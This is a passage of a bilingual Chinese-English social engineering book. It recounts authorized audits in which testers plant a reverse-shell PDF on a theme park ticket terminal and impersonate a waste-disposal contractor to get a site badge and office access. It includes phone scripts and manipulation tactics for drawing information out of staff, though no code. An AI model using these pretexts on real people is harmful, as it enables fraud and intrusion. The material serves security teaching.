Practice makes perfect. Before the attack was launched my partner and I practiced everything. I had to make sure the PDFs worked and that the vector made sense. I also had to have good enough knowledge to be believable to whatever target I was speaking to at the time.

 

练习的重要性不容低估。练习让我能够弄清楚哪些策略有效,哪些无效,并确保我能坚持计划并顺其自然,即使这种趋势不是我计划的方向。

The importance of practicing cannot be understated. Practice enabled me to figure out what tactics would work and what wouldn’t, as well as ensure that I could stick to the plan and go with the flow, even if that flow was in a direction in which I wasn’t planning on going.

 

事后看来,我发现了一些小改进,可以让这次攻击更有效。首先,仅仅依赖恶意 PDF 总是有风险的;我应该建立一个模仿真实癌症研究网站的小网站,并在其中放上 PDF。网站和 PDF 都可能是恶意的。这将使我成功的机会增加一倍,并在一种途径失败的情况下为我提供备份。

In hindsight, I discovered a couple small improvements that would have made this attack more efficient. For one, it is always a risk to rely solely on a malicious PDF; I should have set up a small website that mimicked the real cancer research website and had the PDF on there. Both the website and the PDF could have been malicious. This would have doubled my chances of success and given me backup in case one avenue failed.

 

我冒的另一个大风险是,CEO 离开办公室时会把电脑开着。如果他不开,我就得等到周一才能尝试访问。为了让他留在电脑前,我应该准备一份“真正的 PDF”,里面有他可以阅读的信息,等恶意 PDF 成功利用他的电脑后,我会发送这些信息。这样他就可以在他的电脑前工作足够长的时间,以便充分利用这个漏洞。

Another large risk I took was that the CEO would leave his computer on when he left the office. If he did not, I would have had to wait till Monday to try to gain access. To keep him at his computer, I should have had a “real PDF” with information in it he could read that I would send after the malicious PDF worked in exploiting his machine. This would have kept him working at his machine long enough to make good use of the exploit.

 

这次审计花了大约一周的时间来调查、收集和整理信息,然后进行练习,最后发布。一周的时间,这家公司的秘密可能就被竞争对手或出价最高的人掌握了。读几遍这个故事,试着理解所使用的微妙方法和对话的进行方式。在书面形式中,很难掌握声音、语调和对话节奏,但试着想象自己在这场谈话中,并决定如何处理它。

This audit took about a week’s worth of time to investigate, gather, and organize information for, practice, and then launch. One week and this company’s secrets could have been owned by its competitors or by the highest bidder. Read the story a few times and try to understand the subtle methods used and the way the conversations flowed. Picking up on the voice, tone, and conversation pace is difficult in written form, but try to imagine yourself in this conversation and decide how you would handle it.

 

Hadnagy 案例研究 2:主题公园丑闻

Hadnagy Case Study 2: The Theme Park Scandal

 

主题公园丑闻案对我来说很有趣,因为它涉及一些现场测试。我使用了本书中提到的许多社会工程学技巧,并在此案中进行了彻底的测试。

The theme park scandal case was interesting to me because it involved some onsite testing. I used many of the social engineering skills mentioned throughout this book and thoroughly tested them during this case.

 

这件事之所以有趣还因为其业务性质以及成功诈骗的可能性。如果成功,社交工程师可能会获得数千张信用卡号码。

It was also interesting because of the nature of the business and the potential for a successful scam. If successful, the social engineer could potentially have access to thousands of credit card numbers.

 

目标

The Target

 

攻击目标是一家主题公园,担心其售票系统之一会受到攻击。在顾客签到的地方,每台计算机都包含指向服务器、客户信息和财务记录的链接。该公园想看看攻击者是否有可能使用恶意方法让员工采取可能导致攻击的行动。

The target was a theme park that was concerned about having one of its ticketing systems compromised. Where patrons checked in, each computer contained a link to the servers, client information, and financial records. The park wanted to see whether the possibility existed for an attacker to use malicious methods to get an employee to take an action that could lead to a compromise.

 

其目的不是让员工陷入麻烦,而是看看员工签到计算机被入侵会造成什么损害。此外,其目的不是通过黑客攻击而是通过纯粹的社会工程手段入侵计算机。

The goal wasn’t to get an employee in trouble, but rather to see what damage would result from an employee check-in computer being compromised. In addition, the goal was not to compromise the computers through hacking but through purely social engineering efforts.

 

如果这种攻击真的发生,后果会怎样?会发现哪些数据,哪些服务器会受到攻击?他们不想深入研究,只是想看看第一阶段,即社会工程攻击是否有效。

If such a compromise could occur, what were the ramifications? What data could be found and what servers could be compromised? They didn’t want to go deep, just really find out whether the first stage, a social engineering compromise, could work.

 

为了弄清楚 SE 攻击是否可能成功,我必须了解主题公园登记顾客的流程和方法,以及员工在终端上会做什么和不会做什么——或者更重要的是,可以做什么和不能做什么。

To figure out whether a successful SE attack was possible, I had to understand the theme park’s processes and methods for checking in customers and what the employees would and wouldn’t do at their terminals—or more importantly, could and couldn’t do.

 

故事

The Story

 

如前所述,这项工作的目标并不复杂;我只需要弄清楚柜台后面的人是否会允许“客户”让员工做一些显然不允许的事情。在我考虑那是什么之前,我必须了解他们的业务。

As mentioned earlier, the goal for this particular job wasn’t really complex; I just had to find out whether the person behind the counter would allow a “customer” to get the employee to do something obviously not allowed. Before I could even think of what that was I had to understand their business.

 

我浏览了公园的网站,并使用 Maltego 和 Google 搜索有关该组织的文章和其他信息。我还做了一些现场研究。然后我去了公园,在售票处买了票。在此过程中,我与售票员进行了简短的交谈,并花了一些时间观察“办公室”区域的布局、他们的计算机节点和其他方面。

I browsed the park’s website and used Maltego and Google to research articles and other information about the organization. I also did some onsite research. I then went to the park and went through the process of buying a ticket at the ticket counter. During this process I started a small conversation with the teller, and spent some time observing the layout, their computer nodes, and other aspects of the “office” area.

 

正是在这个地区,我开始看清了事情的真相。在谈话中,我提到我来自一个名声很大的小镇。当她问我在哪里时,我告诉了她,她做出了正常的回答:

This area was where I started to see a clear picture. During the conversation I mentioned I was from a small town with a huge name. When she asked where, and I told her, she issued the normal response:

 

“那到底是哪儿?”

“Where the heck is that?”

 

“这里有网络吗?”

“Do you have Internet access here?”

 

“是的。”

“Yeah, I do.”

 

“哦,你会喜欢这个的。去map.google.com输入邮政编码 11111,然后将其放在卫星视图上。看看那个镇有多小。”

“Oh you’ll love this. Go to maps.google.com and type in the zip code 11111, and put it on satellite view. Look how small that town is.”

 

“哦天哪,这地方太小了。我觉得我今天之前从未听说过这个地方。”

“Oh my gosh; that is tiny. I don’t think I’ve ever heard of this place before today.”

 

在这短短的时间内我了解到了以下几点:

In this short amount of time I knew the following:

 
 
     
  • 出纳员工作空间的布局
  • The layout of the space a teller has to work in
  •  
     
  • 员工如何登记每位顾客
  • How employees check in each patron
  •  
     
  • 计算机具有完全的网络访问权限
  • That the computers have full web access
  •  
 

我回到公园的网站,开始浏览,对他们的流程有了新的认识。我需要一种方法来进入他们的计算机系统。我的借口很合理——我是一位父亲,打算带家人去主题公园玩一天。

I went back to the park’s website and started browsing with a new enlightenment on their processes. I needed a way in to their computer systems. My pretext was a reasonable one—I was a father who was going to take his family to the theme park for the day.

 

我的故事是,我和家人本来没有计划去那里,但我们来到酒店后在网上浏览可以做的事情,发现公园的折扣很大。我们下楼到大堂询问门票,但那里给我们的价格比我们在网上看到的要高得多。

My story was that the family and I didn’t have plans to do it, but we came to the hotel and were browsing the web for things to do and saw a great discount for the park. We went down to the lobby and inquired about getting tickets but the price we were given there was substantially more than what we saw on the web.

 

当我们再次核对找到的价格时,我们发现这是网上的价格。我们付了钱,然后意识到需要打印门票才能扫描。我试图让酒店打印,但打印机坏了。我已经付了钱,担心丢失门票,所以我把它们打印成 PDF 格式,然后通过电子邮件发送给自己。听起来很合理,不是吗?

When we double-checked the price we had found, we discovered it was a web-only price. We paid and then realized the tickets needed to be printed so they can be scanned. I tried to get the hotel to print them but the printer was down. I had already paid and was nervous about losing the tickets so I printed them to a PDF and then e-mailed them to myself. Sounds like a reasonable story, doesn’t it?

 

在我开始实施我的邪恶计划之前,还需要一步。我必须快速打个电话:

One more step was needed before I could launch my evil plot. I had to make a quick phone call:

 

“您好,这是 XYZ 主题公园总部吗?”

“Hello, is this XYZ Theme Park main office?”

 

“当然可以,我能为您做些什么呢?”

“Sure is; how can I help you?”

 

我需要找一位内部办公室人员来询问我的问题,并确保我得到了正确的答案。在请求采购部门后,我被引导到了正确的人那里。我说:“嗨,我叫保罗,来自 SecuriSoft。我们正在免费试用一款新软件,用于阅读甚至打印 PDF。我想向您发送免费下载的 URL,可以吗?”

I needed to get to an internal office person to ask my question and make sure I had the right answer. After requesting the purchasing department, I was directed to the right person. I said, “Hi, my name is Paul from SecuriSoft. We are giving away a free trial of a new software to read and even print PDFs. I would like to send you the URL for the free download, is that okay?”

 

“嗯,我不确定我们是否感兴趣,但你可以给我发一些信息。”

“Well, I’m not sure whether we are interested, but you can send me some information.”

 

“好的,太好了。请问您现在使用的是哪个版本的 Adob​​e?”

“Okay; excellent. Can I ask what version of Adobe you use now?”

 

“我认为我们仍然处于第 8 位。”

“I think we are still on 8.”

 

“好的;今天我将向您发送一份比较信息包。”

“Okay; I will send you out a comparative information packet today.”

 

有了版本信息,我所需要做的就是创建一个嵌入反向 shell 的恶意 PDF(一旦他们打开 PDF,我就能访问他们的计算机),将其命名为 Receipt.pdf,然后通过电子邮件发送给我自己。

Armed with the version information, all I needed to do was create a malicious PDF embedded with a reverse shell (which would give me access to their computer once they opened the PDF), call it Receipt.pdf, and then e-mail it to myself.

 

第二天,我让家人参与了一项小小的社交活动。当他们站在远处时,我走近柜台后面的女士,开始友好地交谈。

The next day I roped my family into a little social engineering action. As they stood off in the distance I approached the woman behind the counter and started a friendly conversation.

 

“嗨,蒂娜,你好吗?”我一边读着她的名牌,一边问道。

“Hi there, how are you…Tina?” I said, reading her name tag.

 

“还好吗,有什么可以帮您的吗?”她带着友好的客户服务微笑说道。

“Doing okay, what can I help you with?” she said with a friendly customer service smile.

 

“瞧,我们决定周末去度假,我现在和家人住在希尔顿酒店,”我指着几英尺外我美丽的家人说道。“我女儿看到了你们主题公园的广告,恳求我们一起去。我们告诉她我们会带她去。我们在网站上找到了很划算的门票优惠……”

“See, we decided to take a little weekend getaway trip and I am at the Hilton over here with my family,” I say, pointing to my beautiful family a few feet away. “My daughter saw the ad for your theme park and begged us to come. We told her that we would take her. We found a great deal on tickets on the website…”

 

“哦,是的,我们的网络特惠——现在非常受欢迎。我可以买你的票吗?”

“Oh, yes, our web-only deal—very popular right now. Can I have your tickets?”

 

“是的,你看,我需要你的帮助,这样我就不会获得‘年度失败者爸爸’奖。”我紧张的笑声被她的笑容掩盖了。我解释说:“蒂娜,我看到了那个优惠,我和妻子说,我们省下 15% 吧,我们在酒店的电脑上买了票。但付完钱后,我无法打印,因为酒店的打印机坏了。但我能够将其保存为 PDF 并通过电子邮件发送给自己。

“Yeah, you see this where I need your help so I don’t get the ‘Loser Dad of the Year’ award.” My nervous laughter was covered by her smile. I explained, “Tina, I saw that deal and my wife and I said, let’s save the 15% and we bought the tickets at the hotel computer. But after I got done paying, I couldn’t print them because the hotel printer was down. But I was able to save it as a PDF and I e-mailed it to myself.

 

我知道这个要求有点奇怪,但你能登录我的电子邮件账户,然后把它打印出来给我吗?”现在这个账户很普通,里面充满了以“孩子们的照片”、“爸爸妈妈的周年纪念日”之类的标题发送的电子邮件。

I know this is an odd request but would you log into my e-mail account and print it out for me?” Now this account was a generic one filled with e-mails titled “Pictures of the kids,” “Dad and Mom’s Anniversary” and things like that.

 

我看得出她真的很难做出这个决定,我不确定沉默是否对我有好处,或者我是否应该帮助她仔细考虑。我说:“我知道这是一个奇怪的要求,但我的小女儿非常想去,我不想对她说‘不’。”我再次指着我的女儿,她表现得非常可爱,但没有耐心。

I could tell she was really struggling with this decision and I was unsure whether the silence would be to my benefit or if I should help her to think it through. I said, “I know it is a weird request, but my little girl is just dying to go and I hate to tell her ‘no.’” I point again to my daughter who was doing a great job at being cute but impatient.

 

“好的,我该怎么做?”

“Okay, how do I do it?”

 

“访问 gmail.com,使用Paul1234@gmail.com和 BESMART 密码登录。”(我知道,使用这个密码在某种程度上很糟糕,但最后一刻的一点警告总是好的。它没有被遵守。)

“Go to gmail.com, log in with Paul1234@gmail.com and a password of B-E-S-M-A-R-T.” (I know, using this password is terrible in a way, but a little last-minute warning never hurt. It went unfollowed.)

 

片刻之后,蒂娜双击了我的 PDF,屏幕一片空白。“你在开玩笑吗——我打印错了吗?哇,我现在肯定会获得失败者爸爸奖。”

Moments later Tina was double-clicking on my PDF and getting a blank screen. “Are you kidding me—did I print it out wrong? Wow, I am definitely getting the Loser Dad award now.”

 

“先生,您知道吗?我真为您感到难过,如果您只支付成人票,我今天就让您的女儿免费入场,怎么样?”

“You know what, sir? I feel so bad for you, what if you just paid for the adult tickets and I will let your daughter in for free today?”

 

“哇,你太慷慨了。”我微笑着递给她 50 美元,感谢她提供的帮助,并请她退出我的电子邮箱。我们分手了,我有一个快乐的女儿,而公园却受到了损害。

“Wow, that is so generous of you.” With a smile I forked over the $50 and thanked her for all her help and asked her to log out of my e-mail. We part ways with me having a happy daughter and the park having been compromised.

 

片刻之后,我的搭档给我发短信,告诉我他“在”收集报告数据。享受了几个小时的放松后,我们离开公园回去工作,为周一的会议编写报告。

Moments later my partner text messaged me and told me that he was “in” and “gathering” data for the report. After enjoying a few hours of relaxation, we left the park to go back to work to compile the report for the Monday meeting.

 

将 SE 框架应用于主题公园黑客攻击

Applying the SE Framework to the Theme Park Hack

 

如本案例研究所示,信息收集并不总是主要基于网络;相反,它可以亲自进行。本案例中最有趣的信息是在亲自拜访期间收集的。了解使用了哪些计算机系统、试探目标以了解他或她对某些问题的反应以及了解票务系统的工作原理是信息收集阶段的主要组成部分。

Information gathering, as shown in this case study, is not always majorly Web-based; instead, it can be done in person. The juiciest information in this case was gathered during an in-person visit. Finding out what computer systems were used, feeling out the target to know how he or she would react to certain questions, and knowing how the ticketing system worked were major components of the information gathering stage.

 

这篇攻略的真正收获是,一个好的借口不仅仅是一个故事,也不仅仅是一些虚构的服装和虚假的口音。一个好的借口是你可以毫不费力地轻松“活”下来的东​​西。

The real takeaway from this particular hack is that a good pretext is more than just a story; it’s more than just some made-up costume and phony accent. A good pretext is something you can easily “live” without too much effort.

 

在这种情况下,我很容易就能像父亲一样说话、行动和交谈,因为我就是父亲。我对成为“失败者”父亲的担忧是真实的,不是编造的,而且听起来很真实,然后被转移到目标身上,让人觉得很真诚。这使得所说的一切都更加可信。

In this scenario I was easily able to speak, act, and talk the father, because I am one. My concern about being a “loser” dad was real, not made up, and comes across as real and then is transferred to the target as genuine. This makes everything that is said more believable.

 

当然,远处有个可爱的孩子渴望地看着售票员,还有一个关于酒店打印机无法使用的可信故事情节也有所帮助。第 2 章提到了这一点,但有时社会工程师会宣传,借口或一般的社会工程基本上就是一个善于撒谎的人。我不相信情况如此。

Of course, having a cute child in the distance looking longingly at the ticket lady helped, and so did a believable storyline about a hotel printer not working. Chapter 2 touched on this, but sometimes a social engineer will promote that pretexting or social engineering in general is just basically being a good liar. I do not believe that is the case.

 

从专业意义上讲,借口是指创造一种现实,操纵目标的情绪和行为,让他走上你希望他走的路。人们通常不会被简单的谎言所激励。社会工程师必须“成为”借口中的角色,这就是为什么使用你可以密切关注、生活和轻松行动的借口是一个好主意。

In a professional sense, pretexting involves creating a reality that will manipulate the target’s emotions and actions to take a path you desire him to take. People are not often motivated by a simple lie. A social engineer must “become” the character in the pretext for a gig, which is why using pretexts that are something you can closely follow, live, and act with ease is a good idea.

 

“免费赠送 PDF 软件”的借口有很大的出错空间。这个借口很可靠,但如果很快就被拒绝,下一次攻击尝试就会延迟几天。这也是一个“幸运的猜测”,即全公司都会使用相同版本的 Adob​​e,而我选择的特定出纳员没有将她的特定版本的 Adob​​e Reader 更新到最新版本,这实际上会使我的攻击尝试无效。

The pretext of the “free PDF software giveaway” had a lot of room for error. The pretext was solid, but a quick rejection would have meant a couple-day lag in the next attack attempt. It was also a “lucky guess” that the same version of Adobe would be used companywide and that the particular teller I chose had not updated her particular version of Adobe Reader to the newest edition, which would have in essence nullified my exploit attempts.

 

我通常不愿意冒险利用人类天生的懒惰,但这次我成功了。有时最好的选择是继续前进,就好像你要求的事情已经成定局一样。这种态度会增强信心,让目标对象觉得你所说或所做的都是合法的。

Banking on inherent human laziness is not a gamble I usually like to take, but in this case it worked out. Sometimes the best bet is to move forward as if what you are asking for is already a done deal. That attitude promotes a feeling of confidence and comes across to the target that what you are saying or doing is legit.

 

正如第 5 章所提到的,使用诸如“我真的需要你的帮助……”之类的单词和短语是一种强有力的工具。人类天生就想互相帮助,尤其是在被要求的时候。

Using words and phrases such as, “I really need your help…” is a powerful tool, as mentioned in Chapter 5. Humans inherently want to help each other, especially when asked.

 

当被要求时,完全陌生的人会竭尽全力“提供帮助”,甚至会打开别人电子邮件帐户中的未知文件,就像本例中那样。请求帮助“可怜的爸爸”带他可爱的女儿去公园,结果却导致系统被入侵。

When asked, complete strangers will go to extraordinary lengths to “help out” even, as in this case, opening a unknown file from someone else’s email account. The plea to help a “poor dad” get his cute daughter into the park lead to a compromised system.

 

一旦被攻破,存储每位客人所有信用卡信息的软件就将对攻击者敞开大门。轻而易举就能收集到这些数据,这可能会让公园面临巨额损失、诉讼和尴尬。

Once compromised, the software that stores all the credit card information for each guest was wide open to an attacker. The ability to collect that data with very little effort could have left the park open to massive loss, lawsuits, and embarrassment.

 

绝密案例研究 1:并非不可能完成的任务

Top-Secret Case Study 1: Mission Not Impossible

 

我和我的同事时不时会卷入某种情况,或者听到一个我们很想看到被拍成电影的故事,但出于安全原因,我们不允许写出来甚至谈论它。出于这些原因,我不能提及谁参与了这个故事,也不能提及故事中被盗的东西,这个故事是一位名叫“蒂姆”的社会工程师告诉我们的。

Every now and then my colleague and I are either involved in a situation or hear of a story that we would love to see turned into a movie, but for security reasons we are not allowed to write about or even speak of it. For those reasons, I cannot mention who was involved or what was taken in the story that comes to us from a social engineer named “Tim.”

 

蒂姆的目标是入侵一个服务器,该服务器存储的信息一旦落入坏人之手,将造成毁灭性后果。这家知名公司需要保护很多信息。当蒂姆被委托获取这家公司的信息时,他知道自己必须全力以赴;这项工作将考验他的社交工程技能。

Tim’s goal was to infiltrate a server that housed information that could be devastating if it fell into the wrong hands. The particular high-profile company involved had a lot to protect. When Tim was contracted to get this company’s information he knew he would have to pull out all the stops; this job would test the very limits of his social engineering skills.

 

目标

The Target

 

目标是一家知名企业,拥有某些绝不能向竞争对手透露的企业机密。这些机密必须存放在无法从外部访问且只能从内部网络路由的服务器上。

The target is a high-profile organization with certain corporate secrets that should never be revealed to its competitors. These secrets had to be guarded on servers that did not have outside access and were only routable from the internal network.

 

蒂姆受雇帮助该公司测试其安全性,以防止“流氓”潜入并带走货物。蒂姆在异地与该公司的一名人员会面,通过电话和电子邮件签署了他们达成的协议。

Tim was contracted to help the company test its security against a “rogue person” being able to infiltrate and walk out with the goods. Tim met one person from the company at an offsite location to sign the deal they worked out over the phone and e-mail.

 

故事

The Story

 

蒂姆面临着巨大的挑战。与任何社会工程工作一样,第一阶段是信息收集。蒂姆不知道自己会用到什么信息,不会用到什么信息,于是他全力以赴,收集了电子邮件布局方案、公开的报价请求、他能找到的所有员工姓名,以及他们所属的任何社交媒体网站、他们撰写和发表的论文、他们参加的俱乐部以及他们使用的服务提供商等信息。

Tim had a huge challenge in front of him. The first stage, as with any social engineering gig, was the information gathering. Not knowing what information he would and wouldn’t use, Tim went full-bore, collecting information such as the e-mail layout scheme, open requests for quotes, all employee names he could find, plus any social media sites they belong to, papers they wrote and published, clubs they were part of, as well as service providers they used.

 

他想去翻垃圾箱,但当他仔细查看时,他发现垃圾箱周围的安保非常严密。许多垃圾箱甚至被小墙围起来,所以除非他突破边界,否则他看不到垃圾箱上的标志。在找到负责废物处理的部门后,他决定给该公司打一个精心策划的电话:

He wanted to do a dumpster dive but when he scoped out the place he noticed that security was very strong around the dumpster area. Many of the dumpsters were even enclosed in small walled areas, so he couldn’t see the logos on the dumpster unless he breached the perimeter. After finding out the department that handles waste services, he decided to place a well-planned-out phone call to the company:

 

“您好,我是 TMZ Waste Disposal 的 Paul。我们是该地区一家新的垃圾处理服务公司,一直与该地区的一些大公司合作。我是负责您所在地区的销售团队的一员。我可以给您发送我们的服务报价吗?”

“Hello, this is Paul from TMZ Waste Disposal. We are a new waste disposal service in the area and have been working with some of the large corporations in the area. I am part of the sales team that handles your region. Could I send you a quote for our services?”

 

“嗯,我们对目前的供应商非常满意,但您可以提交报价。”

“Well, we are pretty happy with our present supplier, but you can submit a quote.”

 

“太好了,我可以问您几个问题吗?”

“Excellent; may I ask you just a few quick questions?”

 

“当然。”

“Sure.”

 

“你们有多少个垃圾箱?”蒂姆问道。在询问他们是否使用专用垃圾箱来存放纸张和技术资料(例如 USB 钥匙和硬盘)后,他做了一些收尾工作。

“How many dumpsters do you have?” asked Tim. After asking whether they used special dumpsters for paper and technology such as USB keys and hard drives, he then laid on a few finishing touches.

 

“您通常在哪天接客?”

“What day is your normal pickup?”

 

“我们每周有两次取货时间;第一组是周三,第二组是周四。”

“We have two pickups per week; Set 1 is Wednesdays and Set 2 is Thursdays.”

 

“谢谢。我可以准备好这份报价单,并在明天下午之前将其发送过来。我应该使用哪个电子邮件?”

“Thank you. I can prepare this quote and have it sent over by tomorrow afternoon. What e-mail should I use?”

 

“请将其亲自发送给我,地址是christie.smith@company.com。”

“Send it to me personally at christie.smith@company.com.”

 

这时,他们开始进行一些友好的闲聊,不知不觉中,他们就开始大笑并互相寒暄。

At this point a little friendly chitchat ensued and before you know it they were laughing and exchanging pleasantries.

 

“非常感谢。嘿,在我们挂断电话之前,我可以问一下你现在用的是哪家公司吗?我喜欢做一个比较报价。”

“Thanks a lot. Hey, before we hang up can I ask you who you presently use? I like to do a comparative quote.”

 

“嗯,你知道......”她犹豫了一下,但随后说道,“当然,我们使用废物管理。”

“Well, you know…” she hesitated, but then said, “Sure, we use Wasters Management.”

 

“谢谢克里斯蒂,我会确保你对报价满意的。我们稍后再谈。”

“Thanks Christie, I will make sure you are happy with the quote. We will talk later.”

 

有了这些信息,蒂姆访问了现有垃圾管理公司的网站,并将徽标复制到 JPG 文件中。然后,他访问了在线衬衫打印机,72 小时后,他拿到了一件印有徽标的衬衫。他知道垃圾收集时间为周三和周四,所以他想在周二晚上去。

Armed with this information, Tim went to the website for the present waste management company and copied the logo to a JPG file. He then visited an online shirt printer and in 72 hours had a shirt with the logo in his hands. Knowing that the garbage is picked up on Wednesday and Thursday he wanted to go Tuesday night.

 

随后,他又给保安部门打了电话:

He then placed another call to the security department:

 

“您好,我是 Wasters Management 的约翰,你们的垃圾箱处理人员。克里斯蒂·史密斯办公室给我打电话说你们的垃圾箱坏了。我知道周三会去收垃圾,所以我想明天晚上过来检查一下。如果有损坏的垃圾箱,我会用卡车运来一个新的。我周二晚上过来可以吗?”

“Hello, this is John from Wasters Management, your dumpster disposal people. I was called by Christie Smith’s office stating that you have a damaged dumpster. I know the pickup is on Wednesday so I wanted to come out and check it tomorrow night. If there is a damaged unit I will have the truck bring out a new one. Is it okay if I come out Tuesday night?”

 

“当然,让我查一下——是的,乔明天上班。当你停车时,只要在保安亭停下,他就会给你一个徽章。”

“Sure, let me check—yes, Joe is on tomorrow. When you pull up just stop in the security booth and he will give you a badge.”

 

“谢谢。”

“Thanks.”

 

第二天,蒂姆穿着“公司”的 Polo 衫,拿着一个剪贴板。这个借口很巧妙,因为他知道日期和内部名称。现在,他看起来像一名公司员工,走向了保安亭。

The next day Tim wore his “company” polo shirt and had a clipboard. The pretext was genius because he knew the dates and internal names. Now, looking like a company employee, he approached the security booth.

 

“乔,我是 Wasters 的约翰,昨天我来过这里。”

“Joe, I’m John from Wasters and I called in yesterday.”

 

警卫插话道:“是的,我看到你的名字了。”他递给他一枚徽章和一张纸质地图,告诉他如何去垃圾箱。“你需要我们其中一个人跟着去吗?”

The guard interrupted with, “Yes, I see your name right here.” He handed him a badge and a paper map telling him how to get to the dumpsters. “Do you need one of us to tag along?”

 

“不,我一直都是这么做的。”

“Nah, I do this all the time.”

 

蒂姆被按了蜂鸣器并开车到了垃圾箱。

Tim was buzzed in and drove over to the dumpsters.

 

有了完美的借口和徽章,他有时间进行挖掘。他知道 2 号垃圾桶里有非食品垃圾,所以他从那里开始挖掘。

Armed with a perfect pretext and a badge he had the time to do some digging. He knew that Set 2 holds the non-food garbage, so he started his digging there.

 

没过多久,他就把几个硬盘、USB 钥匙、一些 DVD 和一些装满纸张的透明袋子装进了后备箱。大约一个小时后,他开车回来,感谢保安人员,并向他们保证一切都没问题。回到办公室后,他翻遍了“垃圾”,发现了一些他做梦也找不到的最有趣的细节。

After just a little while he loaded a few hard drives, USB keys, some DVDs, and some clear bags full of paper in his trunk. After about an hour or so he drove back out, thanked the security guys, and assured them all is good. Back at the office he dug through the “garbage” and was greeted with some of the juiciest details he couldn’t have found in his wildest dreams.

 

很多时候,公司会通过彻底销毁的方式处理硬盘和 USB 介质。他们会删除所有数据,然后将其发送到专门的处理部门。不过,时不时地,一些员工没有考虑清楚处理程序,就会直接扔掉他们声称损坏的 USB 密钥或无法启动的硬盘。他们没有意识到,有许多程序甚至可以从无法启动的驱动器和介质中删除数据。即使介质已被格式化,在许多情况下,数据仍然可以恢复。

Many times companies will dispose of hard drives and USB media by destroying them completely. They will erase all data and then send them to special disposal units. Every now and then, though, employees who don’t think through their disposal procedures will just throw away a USB key they say is broken or a hard drive that no longer boots. What they don’t realize is that there are many programs that can strip data off of even non-bootable drives and media. Even if the media has been formatted, data can still be recovered in many situations.

 

其中一个袋子里装着看起来像是办公室的东西。当他清空袋子时,他注意到一些文件没有被碎纸机处理。他坐下来阅读,发现其中一份是一些 IT 服务招标合同。这项工作本应在几天内开始,但看起来这份特殊的副本被用来吸干洒出来的咖啡,然后被丢弃了。

One of the bags contained what looked like the contents of an office. As he emptied the bag he noticed some papers that had not passed through the shredder. He sat down to read them and saw one was a contract for some IT services that went out for bid. The job was supposed to start in just a few days, but it looked like this particular copy was used to sop up some spilled coffee and then discarded.

 

这将会是一个伟大的发现,但他还有很多东西需要搜索。DVD 是空白的或无法读取的,但令人惊讶的是,他在 USB 密钥上找到了文件。根据这些信息,他发现了首席财务官以及其他一些关键人员的姓名和私人电话。

This would be an great find, but he had so much more to search through. The DVDs were blank or unreadable, but surprisingly enough he located files on the USB keys. From this information he discovered the names and private lines of the CFO as well as some other key personnel.

 

他收集到的信息价值巨大,但我想重点介绍一下他接下来做了什么。第二天早上,他手里拿着 IT 服务合同,知道要执行的工作类型,于是在午餐时间给合同联系人打电话,祈祷联系人出去吃午饭了。

The value of what he gathered was immense but I want to focus on what he did next. The next morning, armed with the contract for the IT services in hand and knowing the type of work that was to be performed, he placed a call to the contract point of contact during the lunch hour and prayed the contact was out to lunch.

 

“你好,塞巴斯蒂安有空吗?”

“Hello, is Sebastian available?”

 

“不,他出去吃午饭了。有什么可以帮你的吗?”

“No, he is out to lunch. Can I help you?”

 

“我是 XYZ Tech 的 Paul。我想确认一下我们的团队将于明天晚上来启动该项目。”

“This is Paul from XYZ Tech. I wanted to confirm that our team will be coming to start the project tomorrow evening.”

 

“是的,请记住我们不能中断服务,所以请不要早于下午 5:30 到达这里”

“Yes, just remember we can’t have any interruption of service so please do not get here any earlier than 5:30 p.m.”

 

“是的,先生,你明白了。明天见。”

“Yes sir, you got it. See you tomorrow.”

 

第二天,蒂姆知道他不能和其他“团队”成员一起到达。但如果他把握好时间,就不会被 IT 公司或目标抓住。他坐在漆黑的停车场对面,看着 IT 合同公司到来。足足 30 分钟后,他走到前门,解释说他只是跑出去从车里拿一些文件。他按门铃进去了,现在可以自由地在办公室里活动了。

The next day Tim knew that he couldn’t arrive with the rest of the “team.” But if he timed it right he would not be caught by the IT company or the target. Sitting across the dark parking lot he watched the IT contract company arrive. After a good 30 minutes he approached the front door and explained how he just ran out to get some paperwork from his car. He got buzzed in and now had free reign of the office.

 

他需要进行侦察,他认为最好的办法是以内部员工的身份接近这家 IT 公司。他四处走动,直到听到有人在说话,然后发现一个穿着衬衫的人自称是 IT 团队的一员。

He needed to do some reconnaissance, and he figured the best way was to approach the IT company as one of the internal employees. He walked around until he heard some talking and found one of the guys in a shirt identifying him as one of the IT team.

 

凭借着 USB 密钥文件中的高层管理人员的姓名以及合同中的联系人信息,他开始说道:“大家好,我是保罗,我和希瓦兹先生(首席财务官)一起工作——有人跟你解释过 prod23 生产服务器吗?”蒂姆从信息收集中得到了服务器名称;蒂姆知道那就是他要攻击的服务器。

Armed with the names of the upper-level management from the USB key files and from the point of contacts from the contract, he began, “Hi there, I’m Paul and I work Mr. Shivaz [the CFO]—did someone explain to you about the prod23 production server ?” Tim had the server name from his information gathering; Tim knew that was the server he was attacking.

 

“是的,我们知道这项工作中禁止使用该服务器。首席财务官向我们解释了加密方法以及我们如何才能不破坏该服务器。不用担心。”

“Yes, we know that server is off-limits in this work. The CFO explained to us the encryption and how we are not to mess with that server. No worries.”

 

经过几分钟的交谈,蒂姆发现了一些有价值的信息:

After a few more minutes of conversing, Tim had discovered some valuable pieces of information:

 
 
     
  • IT 团队不得触碰服务器。
  • The IT team is not to touch the server.
  •  
     
  • 该服务器具有全盘加密。
  • The server has full disk encryption.
  •  
     
  • 内部 IT 人员向技术人员“吹嘘”目标公司如何使用只有管理员才携带的 USB 密钥上的密钥文件。
  • The techs were “bragged” to by the in-house IT guy about how the target company use a keyfile on a USB key that only the admins carry.
  •  
 

Tim 知道最后一点会使他的任务更加困难,而且由于管理员不在,他现在无法访问服务器。此外,该服务器周围的物理安全非常严格,可能过于坚固,无法承担风险。他确实知道管理员可以访问该服务器,所以他想也许他会尝试这种方式。

Tim knew this last point would make his task harder, and because the admins were not in, he would not be able to access the server now. In addition, the physical security around this server was very intense and may have been too hardened to take the risk. He did know that the admins would have access to this server so he thought maybe he would try that avenue.

 

他去了行政办公室的第一间,但门锁着。他又看了第二间办公室,然后是第三间。第三间门关着,但并没有完全关上,他推了一下,门就开了。他进去了。

He visited the first office of the admin, but it was locked. He checked the second office, then the third. The third one was shut but had not been closed all the way and it merely opened when he pushed a little. He was in.

 

通过拉上窗帘和关掉灯,他觉得自己可以稍微避免被抓。在他的社交工程师工具包中,他携带了各种各样的工具和服装。在这类工作中,他总是随身携带的工具之一是 USB 密钥,里面装有可启动的 Linux 发行版,例如 BackTrack。BackTrack 安装中预装了 Virtual Box 版本,这是一款免费的开源虚拟机工具。

